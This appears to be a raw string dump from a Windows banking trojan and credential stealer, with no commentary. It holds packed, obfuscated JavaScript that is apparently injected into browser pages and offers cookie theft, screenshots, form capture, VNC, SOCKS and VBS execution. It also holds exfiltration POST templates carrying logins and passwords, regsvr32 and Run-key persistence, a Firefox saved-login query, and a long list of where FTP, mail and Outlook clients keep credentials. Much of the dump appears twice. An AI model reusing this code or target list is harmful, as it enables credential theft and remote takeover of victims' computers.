b=H.1n(a);b.1o.P(b)}};',62,87,'this|||||||||||||||||||function|return|Query|if||null|true|POST||var|false|GET|responseText|_LastAsync|typeof|else|catch|try|readyState|new||status|200|undefined|document|onreadystatechange|open|send|XMLHttpRequest|GetLastAsync|SetVal|Version|removeChild|GetVal|_Key||DelVal|ClearVals|GetServer|Math|random|PostServer|Get||||||||Cookie|Post|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|Key|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode'.split('|'),0,{}));
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
c:\test_x32.dll
#dbgmsg
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
C:\ProgramData
%Documents and Settings%\All Users\Application Data
chrome.dll
127.0.0.1
Content-Disposition: form-data; name="%s"
--%s--
Content-Disposition: form-data; name="%s"; filename="%s"
---------------------------%u%0.4x%0.8x
Content-Type: application/x-www-form-urlencoded
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
user_pref("layers.acceleration.disabled", true);
user_pref("gfx.direct2d.disabled", true);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
Dbgview.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
%s%s%u
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
regsvr32.exe "%s"
Software\Microsoft\Windows\CurrentVersion\Run
#cert
regsvr32.exe /s /i:"%u" "%s"
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
\\.\pipe\
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
dbghelp.dll
\%u.dmp
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
account.cfg
account.cfn
Dir #%u
<POP3_Password2
<SMTP_Password2
<IMAP_Password2
<HTTPMail_Password2
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
Server.Pass
Server.Host
Server.User
Server.Port
Last Server Pass
Last Server Port
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Email Address
SMTP Server
SMTP User Name
HTTP User
HTTP Server URL
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Port
SMTP Port
IMAP Port
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTPMail Password
SMTP Password
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
ole32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegEnumKeyExA
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
HttpAddRequestHeadersA
FindCloseUrlCache
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
COMDLG32.dll
WININET.DLL
&.ipO
;&;,;3;^;
:$:,:7:?:
9”9C9
.pdata
@.reloc
c:\test_x64.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
lc:\64.dll
64.dll
Explorer.EXE_1440_rwx_04820000_0007E000:
.text
`.rdata
@.data
.reloc
HHt.HHt
hu2.iuj
More information: hXXp://VVV.ibsensoftware.com/
8HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
tor2web.org
hXXps://%s.%s/favicon.ico
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('k N(j){0.F=j;0.w=p;0.O=2;0.m=k(a,b,c,d){u f=W J();u g=0;u h=(y(d)==\'G\')?t:q;u b=\'/\' 0.F \'/\' Q.V() \'/\' b;u i=p;o(h==q){0.w=p;f.I=k(){C{o(f.A==4){o(f.E!=H||f.x==\'-\'){g.w=t;o(y(d)=="k"){d(t)}}z{o(f.x==\' \'){g.w=q;o(y(d)=="k"){d(q)}}z{g.w=f.x;o(y(d)=="k"){d(f.x)}}}}}B(e){g.w=t;o(y(d)=="k"){d(t)}}}}f.K(a,b,h);f.L(c);o(h==q){l q}C{o(f.A==4&&f.E==H){o(f.x==\'-\'){l t}z{o(f.x==\' \'){l q}z{l f.x}}}l t}B(e){l t}};0.M=k(){l 0.w};0.1l=k(a,b,c){l 0.m(\'s\',\'1/\' a,b,c)};0.P=k(a,b){l 0.m(\'v\',\'2/\' a,p,b)};0.R=k(a,b){l 0.m(\'v\',\'3/\' a,p,b)};0.T=k(a){l 0.m(\'v\',\'4/\',p,a)};0.U=k(a,b,c){l 0.m(\'v\',\'5/\' ((b==q)?\'S\':\'D\') \'/\' a,p,c)};0.X=k(a,b,c,d){l 0.m(\'s\',\'5/\' ((b==q)?\'S\':\'D\') \'/\' a,c,d)};0.Y=k(a,b,c,d){o(y(c)==\'G\'||c==t){u e=p;u f=\'v\'}z{u e=\'Z: \' c;u f=\'s\'}l 0.m(f,\'6/\' ((b==q)?\'S\':\'D\') \'/\' a,e,d)};0.17=k(a,b,c,d){l 0.m(\'s\',\'7/\' ((b==q)?\'S\':\'D\') \'/\' a,c,d)};0.18=k(a,b,c,d){l 0.m(\'v\',\'8/\' b \'/\' c \'/\' 19(a),p,d)};0.1a=k(a,b){l 0.m(\'s\',\'9/\',a,b)};0.1b=k(a){l 0.m(\'v\',\'10/\',p,a)};0.1c=k(a,b){l 0.m(\'s\',\'11/\',a,b)};0.1d=k(a,b){l 0.m(\'s\',\'12/\',a,b)};0.1e=k(a,b,c){l 0.m(\'s\',\'13/\',a "\\r\\n" b,c)};0.1f=k(a,b){l 0.m(\'s\',\'14/\' a,1g.1h.1i,b)};0.1j=k(a){l 0.m(\'v\',\'15/\',p,a)};0.1k=k(a,b){l 0.m(\'s\',\'16/\',a,b)}};',62,84,'this||||||||||||||||||||function|return|Query||if|null|true||POST|false|var|GET|_LastAsync|responseText|typeof|else|readyState|catch|try||status|_Key|undefined|200|onreadystatechange|XMLHttpRequest|open|send|GetLastAsync|EQFramework|Version|GetVal|Math|DelVal||ClearVals|GetServer|random|new|PostServer|Get|Cookie||||||||Post|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|document|location|href|StopVideo|ExecVBS|SetVal'.split('|'),0,{}));
eval('var %s '
function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=C j(){0.1h=o;0.w=o;0.O=3;0.l=j(a,b,c,d){s f=C L();s g=0;s h=(x(d)==\'G\')?t:p;s b=\'/\' 0.R \'/\' W.X() \'/\' b;s i=o;m(h==p){0.w=o;f.I=j(){A{m(f.B==4){m(f.E!=F||f.v==\'-\'){g.w=t;m(x(d)=="j"){d(t)}}y{m(f.v==\' \'){g.w=p;m(x(d)=="j"){d(p)}}y{g.w=f.v;m(x(d)=="j"){d(f.v)}}}}}z(e){g.w=t;m(x(d)=="j"){d(t)}}}}f.J(a,b,h);f.K(c);m(h==p){k p}A{m(f.B==4&&f.E==F){m(f.v==\'-\'){k t}y{m(f.v==\' \'){k p}y{k f.v}}}k t}z(e){k t}};0.M=j(){k 0.w};0.N=j(a,b,c){k 0.l(\'q\',\'1/\' a,b,c)};0.Q=j(a,b){k 0.l(\'u\',\'2/\' a,o,b)};0.T=j(a,b){k 0.l(\'u\',\'3/\' a,o,b)};0.U=j(a){k 0.l(\'u\',\'4/\',o,a)};0.V=j(a,b,c){k 0.l(\'u\',\'5/\' ((b==p)?\'S\':\'D\') \'/\' a,o,c)};0.Y=j(a,b,c,d){k 0.l(\'q\',\'5/\' ((b==p)?\'S\':\'D\') \'/\' a,c,d)};0.Z=j(a,b,c,d){m(x(c)==\'G\'||c==t){s e=o;s f=\'u\'}y{s e=\'17: \' c;s f=\'q\'}k 0.l(f,\'6/\' ((b==p)?\'S\':\'D\') \'/\' a,e,d)};0.18=j(a,b,c,d){k 0.l(\'q\',\'7/\' ((b==p)?\'S\':\'D\') \'/\' a,c,d)};0.19=j(a,b,c,d){k 0.l(\'u\',\'8/\' b \'/\' c \'/\' 1a(a),o,d)};0.1b=j(a,b){k 0.l(\'q\',\'9/\',a,b)};0.1c=j(a){k 0.l(\'u\',\'10/\',o,a)};0.1d=j(a,b){k 0.l(\'q\',\'11/\',a,b)};0.1e=j(a,b){k 0.l(\'q\',\'12/\',a,b)};0.1f=j(a,b,c){k 0.l(\'q\',\'13/\',a "\\r\\n" b,c)};0.1g=j(a,b){k 0.l(\'q\',\'14/\' a,H.1i.1j,b)};0.1k=j(a){k 0.l(\'u\',\'15/\',o,a)};0.1l=j(a,b){k 0.l(\'q\',\'16/\',a,b)};0.1m=j(a){s b=H.1n(a);b.1o.P(b)}};',62,87,'this|||||||||||||||||||function|return|Query|if||null|true|POST||var|false|GET|responseText|_LastAsync|typeof|else|catch|try|readyState|new||status|200|undefined|document|onreadystatechange|open|send|XMLHttpRequest|GetLastAsync|SetVal|Version|removeChild|GetVal|_Key||DelVal|ClearVals|GetServer|Math|random|PostServer|Get||||||||Cookie|Post|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|Key|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode'.split('|'),0,{}));
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
c:\test_x32.dll
#dbgmsg
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
C:\ProgramData
%Documents and Settings%\All Users\Application Data
chrome.dll
127.0.0.1
Content-Disposition: form-data; name="%s"
--%s--
Content-Disposition: form-data; name="%s"; filename="%s"
---------------------------%u%0.4x%0.8x
Content-Type: application/x-www-form-urlencoded
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
user_pref("layers.acceleration.disabled", true);
user_pref("gfx.direct2d.disabled", true);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
Dbgview.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
%s%s%u
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
regsvr32.exe "%s"
Software\Microsoft\Windows\CurrentVersion\Run
#cert
regsvr32.exe /s /i:"%u" "%s"
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
\\.\pipe\
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
dbghelp.dll
\%u.dmp
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
account.cfg
account.cfn
Dir #%u
<POP3_Password2
<SMTP_Password2
<IMAP_Password2
<HTTPMail_Password2
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
Server.Pass
Server.Host
Server.User
Server.Port
Last Server Pass
Last Server Port
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Email Address
SMTP Server
SMTP User Name
HTTP User
HTTP Server URL
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Port
SMTP Port
IMAP Port
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTPMail Password
SMTP Password
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
ole32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegEnumKeyExA
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
HttpAddRequestHeadersA
FindCloseUrlCache
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
COMDLG32.dll
WININET.DLL
N.UAE
C:\ProgramData\LibxaJximb\QamzEsom.ijv
